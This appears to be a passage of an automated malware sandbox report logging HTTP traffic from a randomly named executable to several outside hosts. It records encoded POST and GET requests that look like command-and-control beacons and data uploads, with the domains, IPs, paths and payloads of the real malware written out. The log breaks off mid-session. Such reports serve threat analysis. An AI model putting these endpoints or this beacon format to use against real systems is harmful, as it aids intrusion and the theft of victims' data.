                                                          Data Ascii: TvpPfhGp=mUz7sZ2RmY+ZpbP+iwmcoe9hHbLui/bgLojH9zLMzgUOhRJ6ZX/AD9IGZaoSuOZDb/IHlOX/DZ4R9JVV80Fnb0Zx/NxUn9WiqRp5SE2hgsJVx+PeWzprWkZAIyxkWEPszXhPdwleFDixW1Rdlb9JEc/ZfJLd4o50k+DlzsIaxhLZTDlz9rH3OmHyxp4uwhCVA4tXWfWacRNZou5B5ZFLaWe/OajNvg4501z6KXnoDEUpzkfgskP2T1bmSqRonw32yMw9hij8/+DOkuQiz2JZ0X7TKhQzgQSWNje6uyLyzsZKn1xcubW+OB9wOy+OkLQ0TJRNHgLlHrtSxqJbvnc3ufw8gy0nRkK7aoKXj3Lm4tuDf/sy7kVC85l3fO4efLaSBY7SdhZxStbEDU4XDffdpYMg6Ufy6Ug8oWPYRMzbWju8l4ykoiv0zyAejvbdu2XalG4lyfuLY/n1hJ68iPULpcJi4aG37TqYFNC+vl2BzzJeJex6nrsSDb2ftYDrtnLeNc4L1M2uH880J25Hh2ETy3Ec5qPocSyiOJ7IZTdxb/mrqh5Ci65YvuZ2kC85c2FiCQSnBsdLnrqg3ZVI62z9r57IJO2VKq8EsnhUlGSta8AkjdgaCEcmEPX2Uv5szmhyCWuEc3iIR37oNwx80BHFmleHra6sWYfTFPvSlJZYsNnUIzbK+vfuDbIX9nu+viFT7YFjauF9WyMt5Wr8X1GNe4UQCB0Rgn8X2L+dELfVknVMm6UUcNAsAbX112y1gOspmXBAb1K/dASW2hpRO6M0rnidhVl1DxVrr52sT7f1x5CW1ohHcc7p1X2MhP35LPFQrGmjwTUFZnuT7XG5eHlYfUjKSLFiQJAf9J4qeWwqlDSmQukUE/58RSxYj+pedkzxfq5RbFWwJFJcRWWbkC2N4LX8UU7jjAZMYdQVothVKAx4MtAiTHFeRVMyyFpJWEe3WLsia3vEm0GOJ6XNdHHW05avEacwtierwtpIv4pXuko [TRUNCATED]
                                                          Jul 3, 2024 15:58:15.603627920 CEST580INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:58:15 GMT
                                                          Server: Apache
                                                          Content-Encoding: gzip
                                                          Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                          Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.44976174.208.236.38801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:17.569860935 CEST461OUTGET /8g7d/?TvpPfhGp=rWbbvp+cwrqQgazA9nOhlKpoIaKdpvX3NtKjwAvzyCJ08CtHZWjUKOIyI7s4v/dodflG0NuedqdGjOxv5Uk5GEd+1aRY1dG/6xJxc0ee/cBS07/9XhY/WVk=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.costmoon.com
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:58:18.095403910 CEST770INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Content-Length: 626
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:58:18 GMT
                                                          Server: Apache
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.44976238.47.232.185801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:23.521548986 CEST717OUTPOST /axxb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.w25dn.top
                                                          Origin: http://www.w25dn.top
                                                          Referer: http://www.w25dn.top/axxb/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 65 71 4f 43 2b 2b 68 77 4f 6b 34 69 51 39 2b 4b 75 39 67 4b 30 6f 51 48 2f 56 76 71 6c 49 54 67 7a 47 6f 62 31 54 61 32 2f 2f 74 4a 52 39 59 74 69 78 54 53 71 2f 6d 64 69 6a 2f 51 73 4d 61 37 76 59 45 43 73 36 4e 72 32 44 6a 47 56 34 4b 57 78 30 33 48 56 49 74 4b 4b 41 36 37 37 58 67 38 33 4a 49 47 35 6a 38 39 36 57 65 6e 48 49 59 4a 35 35 51 65 4c 62 5a 37 37 71 49 66 64 35 6b 75 54 70 45 39 2b 41 47 6c 77 52 37 77 58 30 6e 46 4e 4e 62 6a 70 46 65 35 76 43 6a 70 6c 67 53 67 38 34 6c 73 6e 75 75 66 33 44 4a 42 5a 74 4f 59 54 56 37 2f 64 6e 54 65 33 70 6c 71 42 33 43 48 77 41 3d 3d
                                                          Data Ascii: TvpPfhGp=eqOC++hwOk4iQ9+Ku9gK0oQH/VvqlITgzGob1Ta2//tJR9YtixTSq/mdij/QsMa7vYECs6Nr2DjGV4KWx03HVItKKA677Xg83JIG5j896WenHIYJ55QeLbZ77qIfd5kuTpE9+AGlwR7wX0nFNNbjpFe5vCjplgSg84lsnuuf3DJBZtOYTV7/dnTe3plqB3CHwA==
                                                          Jul 3, 2024 15:58:24.427017927 CEST289INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 03 Jul 2024 13:58:24 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.44976338.47.232.185801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:26.057864904 CEST737OUTPOST /axxb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.w25dn.top
                                                          Origin: http://www.w25dn.top
                                                          Referer: http://www.w25dn.top/axxb/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 65 71 4f 43 2b 2b 68 77 4f 6b 34 69 57 64 75 4b 76 65 34 4b 78 49 51 59 7a 31 76 71 71 6f 54 37 7a 47 6b 62 31 53 65 6d 71 64 5a 4a 57 5a 51 74 77 67 54 53 70 2f 6d 64 6f 44 2f 66 7a 38 61 77 76 59 49 77 73 36 42 72 32 48 7a 47 56 36 69 57 79 48 75 52 56 59 74 4d 53 77 36 35 2f 58 67 38 33 4a 49 47 35 6e 51 62 36 56 75 6e 41 37 41 4a 72 49 51 64 42 37 5a 34 38 71 49 66 5a 35 6c 6c 54 70 45 50 2b 42 71 44 77 58 2f 77 58 31 58 46 4e 38 62 69 6e 46 65 37 72 43 69 35 67 43 76 63 78 72 73 36 6d 38 6d 39 32 78 56 64 59 72 66 43 43 6b 61 6f 50 6e 33 74 71 75 73 65 4d 30 2f 4f 72 4a 41 6b 6d 53 38 44 45 6b 63 74 6a 4f 4b 56 67 79 64 54 38 39 77 3d
                                                          Data Ascii: TvpPfhGp=eqOC++hwOk4iWduKve4KxIQYz1vqqoT7zGkb1SemqdZJWZQtwgTSp/mdoD/fz8awvYIws6Br2HzGV6iWyHuRVYtMSw65/Xg83JIG5nQb6VunA7AJrIQdB7Z48qIfZ5llTpEP+BqDwX/wX1XFN8binFe7rCi5gCvcxrs6m8m92xVdYrfCCkaoPn3tquseM0/OrJAkmS8DEkctjOKVgydT89w=
                                                          Jul 3, 2024 15:58:26.956707954 CEST289INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 03 Jul 2024 13:58:26 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.44976438.47.232.185801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:28.584786892 CEST10819OUTPOST /axxb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.w25dn.top
                                                          Origin: http://www.w25dn.top
                                                          Referer: http://www.w25dn.top/axxb/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 65 71 4f 43 2b 2b 68 77 4f 6b 34 69 57 64 75 4b 76 65 34 4b 78 49 51 59 7a 31 76 71 71 6f 54 37 7a 47 6b 62 31 53 65 6d 71 64 68 4a 57 72 49 74 69 54 4c 53 6f 2f 6d 64 72 44 2f 63 7a 38 61 78 76 5a 67 30 73 36 64 52 32 46 37 47 61 35 61 57 33 32 75 52 65 59 74 4d 4f 41 36 34 37 58 67 54 33 4a 59 61 35 6e 67 62 36 56 75 6e 41 2b 4d 4a 6f 5a 51 64 53 72 5a 37 37 71 49 54 64 35 6c 4e 54 70 63 6c 2b 42 75 4d 77 6e 66 77 58 56 48 46 65 2b 6a 69 34 31 65 39 6d 69 6a 38 67 43 6a 35 78 6f 59 41 6d 39 53 48 32 7a 4a 64 62 71 71 50 61 6b 58 2f 54 46 66 54 70 50 41 34 44 69 72 41 74 34 45 36 68 67 42 61 5a 31 31 48 68 66 2b 62 32 78 42 78 2f 4e 48 72 4d 30 70 56 6f 5a 56 71 68 4b 4a 38 43 63 4d 69 4c 57 37 64 4f 35 43 2b 39 61 38 59 6d 67 45 4c 46 78 4f 4c 47 49 6b 6f 2f 77 38 79 6c 4b 56 36 41 4d 4a 77 2b 46 50 58 57 34 39 54 41 2f 44 6c 6b 54 45 76 56 58 36 7a 53 62 4e 55 6b 72 65 38 38 69 34 5a 78 6d 47 74 43 47 6c 6b 4d 38 69 45 45 6c 34 2b 50 6c 33 6a 38 48 66 4d 2b 2b 46 53 6d [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=eqOC++hwOk4iWduKve4KxIQYz1vqqoT7zGkb1SemqdhJWrItiTLSo/mdrD/cz8axvZg0s6dR2F7Ga5aW32uReYtMOA647XgT3JYa5ngb6VunA+MJoZQdSrZ77qITd5lNTpcl+BuMwnfwXVHFe+ji41e9mij8gCj5xoYAm9SH2zJdbqqPakX/TFfTpPA4DirAt4E6hgBaZ11Hhf+b2xBx/NHrM0pVoZVqhKJ8CcMiLW7dO5C+9a8YmgELFxOLGIko/w8ylKV6AMJw+FPXW49TA/DlkTEvVX6zSbNUkre88i4ZxmGtCGlkM8iEEl4+Pl3j8HfM++FSmmBPc/OH60AlYm9+ilsnAS22Hu+dOv/APfrgBtNUwAuJ/+hMwTkG2HFty+JfcgZbJl/hRBiyJ2k79069FwzfYYbvF1YIWuhnLBdwkkD2IV+QqV18O/sgGEJHL9XAfZaGwXp88/3ieTx192MQTHtHOBYqJ3Ca7xjIsz/bZy76s9Ugpcky55HJU2Jjin6lk9L/fS+1ydv74nn8utpsIp80vXNOik6BgOn/pqROrvycWBSfO7awISyh3ze99Pc06qWheRxfZYeW1gH+LMvS2hGT8i9f364Y8M4hsNxQmZ5tHDOnZcaTm0Id6xw3JwHigICtaRNaIIh6uMSk2+IvhmSm2sUD4EPVyaf/ycS/+lq8cUCNRkH5WQM0Sr7rxobsOLFBvyptXU7qnEfJaQJ/uYin14to9Q/ysdSY1rGVVmRYVBu6YU3zFlYkceHnDY9CPQQKaigx0H+4L21ZcWl9NavZF1gDh931DfGki29VC9u4+SQKFw2Y0ei1nwPLrDZ911QrJvFtMso4TWqzHZlxZVljJemGMPaQOJnAn6c7Gh2XFOjmR81Idmq1AEkt64z8b/mYOT3JiBsYImMZbn/XceLZMgdBB9ZFEWhlbxMiBJJDdjjnOORhzWxyxewcm9BmH9233jDbb+1TCSN9WlqRMRbP6JIeqpHI1687Nmh [TRUNCATED]
                                                          Jul 3, 2024 15:58:29.505669117 CEST289INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 03 Jul 2024 13:58:29 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.44976538.47.232.185801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:31.116873026 CEST458OUTGET /axxb/?TvpPfhGp=Tomi9JcGHwU5W62uuIED6rgr9HvHoI2i1WV2/yOG5tMyELYD9gbQrdSRvly679CAlYQP7KMM3mPFOKjE9n3WDNNFNlS8pk0/g6E2kBMo21yRC+YJoIsNK7I=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.w25dn.top
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:58:32.119332075 CEST289INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 03 Jul 2024 13:58:31 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.44976646.30.211.38801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:45.299827099 CEST720OUTPOST /2gp2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.n-ambu.com
                                                          Origin: http://www.n-ambu.com
                                                          Referer: http://www.n-ambu.com/2gp2/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 56 2f 56 46 68 41 36 73 36 6e 56 79 52 7a 6d 54 49 4a 44 32 52 50 36 6e 6c 54 58 58 36 78 46 76 42 73 6c 5a 46 6b 57 57 77 46 33 4d 34 44 41 53 2f 4a 6c 4b 41 41 41 42 6c 4b 39 5a 72 73 6c 2f 4a 2f 64 48 65 62 54 57 36 51 42 76 59 41 38 36 2f 68 69 33 35 38 4c 35 47 6a 38 38 66 62 69 62 61 6c 49 48 6d 33 68 53 37 6c 4c 46 77 34 6d 50 68 2b 4d 31 70 71 35 73 44 4b 38 43 6e 6e 52 41 52 70 6e 61 47 71 44 33 59 72 76 68 42 65 7a 70 74 50 6b 4d 42 61 6f 68 46 6e 2b 7a 62 4a 50 6d 46 4d 4e 6e 35 68 68 33 2b 4f 67 50 62 55 73 2f 44 4d 4b 6e 77 56 44 51 39 53 48 52 4c 6f 4d 77 4c 77 3d 3d
                                                          Data Ascii: TvpPfhGp=V/VFhA6s6nVyRzmTIJD2RP6nlTXX6xFvBslZFkWWwF3M4DAS/JlKAAABlK9Zrsl/J/dHebTW6QBvYA86/hi358L5Gj88fbibalIHm3hS7lLFw4mPh+M1pq5sDK8CnnRARpnaGqD3YrvhBezptPkMBaohFn+zbJPmFMNn5hh3+OgPbUs/DMKnwVDQ9SHRLoMwLw==
                                                          Jul 3, 2024 15:58:46.290000916 CEST336INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 03 Jul 2024 13:58:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 162
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                                          Jul 3, 2024 15:58:46.290860891 CEST336INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 03 Jul 2024 13:58:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 162
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.44976746.30.211.38801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:47.837883949 CEST740OUTPOST /2gp2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.n-ambu.com
                                                          Origin: http://www.n-ambu.com
                                                          Referer: http://www.n-ambu.com/2gp2/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
